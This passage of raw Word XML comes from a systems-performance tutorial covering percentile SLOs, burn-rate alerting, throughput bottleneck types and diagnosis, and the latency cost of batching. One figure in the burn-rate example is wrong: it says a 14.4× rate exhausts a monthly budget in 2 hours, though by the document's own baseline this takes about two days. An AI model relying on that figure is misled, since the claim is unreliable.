        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Why percentile SLOs rather than average:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C56B1B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Average latency is dominated by the common case (p50). A service with average 10ms but p99 of 10 seconds looks good by average but is catastrophic for the 1% of users hitting the tail. Percentile SLOs directly protect the tail-latency-affected users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AAA15B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SLO alerting via burn rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FD02E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Rather than alerting when latency exceeds a threshold at any instant (too noisy — transient spikes), alert when the </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rate of SLO violations</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> is consuming the error budget faster than sustainable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A64AEB6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F3357" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO: p99 &lt; 500ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1656D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Error budget: 0.1% of requests per month can exceed 500ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8CD1BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Sustainable burn rate: 0.1%/month = 0.0033%/day = consume budget at 1×</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645793B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0ECA6265" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Alert if burn rate &gt; 14.4× sustained for 1 hour:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D75CA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → At this rate, budget exhausted in 2 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0C8998" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Page immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807636F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="5E7E83A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Alert if burn rate &gt; 6× sustained for 6 hours:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D477B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → At this rate, budget exhausted in 5 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBFACB" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Ticket / low-priority alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D13808" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="437CDA22">
          <v:rect id="_x0000_i5199" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="425F4F2B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Throughput — Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CEA4E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Throughput Bottleneck Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36658954" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Every system has one </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>binding constraint</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> — the resource that limits throughput. All other resources have spare capacity. Increasing capacity of non-bottleneck resources does nothing for throughput. Only increasing capacity of the bottleneck resource increases throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705230EE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Theory of Constraints applied to systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C1D5D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F38D9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>System throughput = throughput of the bottleneck resource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE4C249" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="2EFE421D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Bottleneck identification:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B12F9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Look for: highest utilization, longest queue, highest wait time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453BC63" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  The resource at 95%+ utilization while others are at 20% → bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6F0B64" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E14C49B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Bottleneck types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC760DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  CPU-bound:     throughput limited by CPU processing speed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DC40CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 adding CPUs (more cores, more servers) increases throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AEC0A1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B20B741" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Memory-bound:  throughput limited by memory bandwidth or capacity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11231F7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 cache misses cause CPU to stall waiting for memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7BE750" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 adding faster DRAM or increasing cache size helps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65A6EE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C1BB25" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  I/O-bound:     throughput limited by disk or network I/O bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24356D9C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 faster disks (NVMe vs SSD vs HDD), more disks (RAID), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BAB431" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 network bandwidth upgrades increase throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059F9053" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55706F6E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Lock-bound:    throughput limited by serialization at a contended lock</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556FC067" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 the USL's α term — adding more CPUs doesn't help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B350968" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                 lock-free algorithms, lock partitioning, or lock-free data structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB6BA63" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09195F7B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Database-bound: throughput limited by database query throughput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D709A5F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">                  indexes, query optimization, connection pooling, read replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DEFA30" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identifying the bottleneck — the diagnostic hierarchy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C30EED0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C466033" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>1. CPU utilization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E57F09" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   &lt; 50%: CPU is not the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19475583" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   &gt; 90%: CPU is likely the bottleneck (but check if it's in kernel or user space)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A842E0" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   High user-space CPU: computation is the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321A85BC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   High kernel-space CPU (sys %): system calls, network processing is the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E894886" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="33B0249B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>2. I/O wait (%iowait):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077925AE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   &gt; 20%: I/O is a significant bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA72FBE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   Combined with high disk utilization: disk I/O bound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DF7A52" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   Combined with network saturation: network I/O bound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15645DA7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="46699C8B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>3. Memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA76845" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   High page fault rate: working set exceeds physical RAM → swap thrashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D580EDD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   High LLC (Last Level Cache) miss rate: memory bandwidth bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563EE80F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="465974FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>4. Lock contention:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EA238A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   High %sys with low %user: spinlocks burning CPU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61625B38" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   pprof/perf showing mutex wait: lock contention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15525760" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   Thread count growing without throughput growth: lock-bound</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EEC429" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6CE81AE7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>5. Queue depths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D1119" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   Growing application queue: application is the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5065A540" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   Growing TCP SYN queue: accepting connections faster than processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668178CA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">   Growing disk I/O queue: disk is the bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1003D6D8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Throughput-Latency Trade-off at the System Level</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55E0CD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Batching — the fundamental throughput optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E0B7D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Processing N items in a single operation amortizes fixed overhead across N items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B8D5B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADAB8D1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Individual processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F1252F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Per-item overhead: O (syscall, network round-trip, lock acquisition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C4E45" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Per-item work: W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC390DF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Cost per item: O + W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9992C1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: 1 / (O + W) items/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FC47D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6E41C919" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Batch processing (batch size B):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCAE2E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Per-batch overhead: O (paid once for B items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0342FC59" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Per-item work: W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD78985" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Cost per item: O/B + W</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C38D15" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput: B / (O + BW) = 1 / (O/B + W) items/second</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27084056" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="0298F7B1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>As B → ∞: throughput → 1/W (overhead amortized to zero)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4162E99D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The latency cost of batching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA8FB3E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Batching requires waiting for B items to accumulate before processing. The maximum additional latency = the time to collect B items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBB1D6B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18644593" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>If arrival rate = λ items/second:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CDD89D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Time to collect B items = B/λ seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FBF26D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Additional latency = B/λ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04900EF3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="259A4178" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>For λ=1000/s and B=100:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CE4D1F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Additional latency = 100/1000 = 0.1 seconds = 100ms</w:t>
      </w:r>
    </w:p>
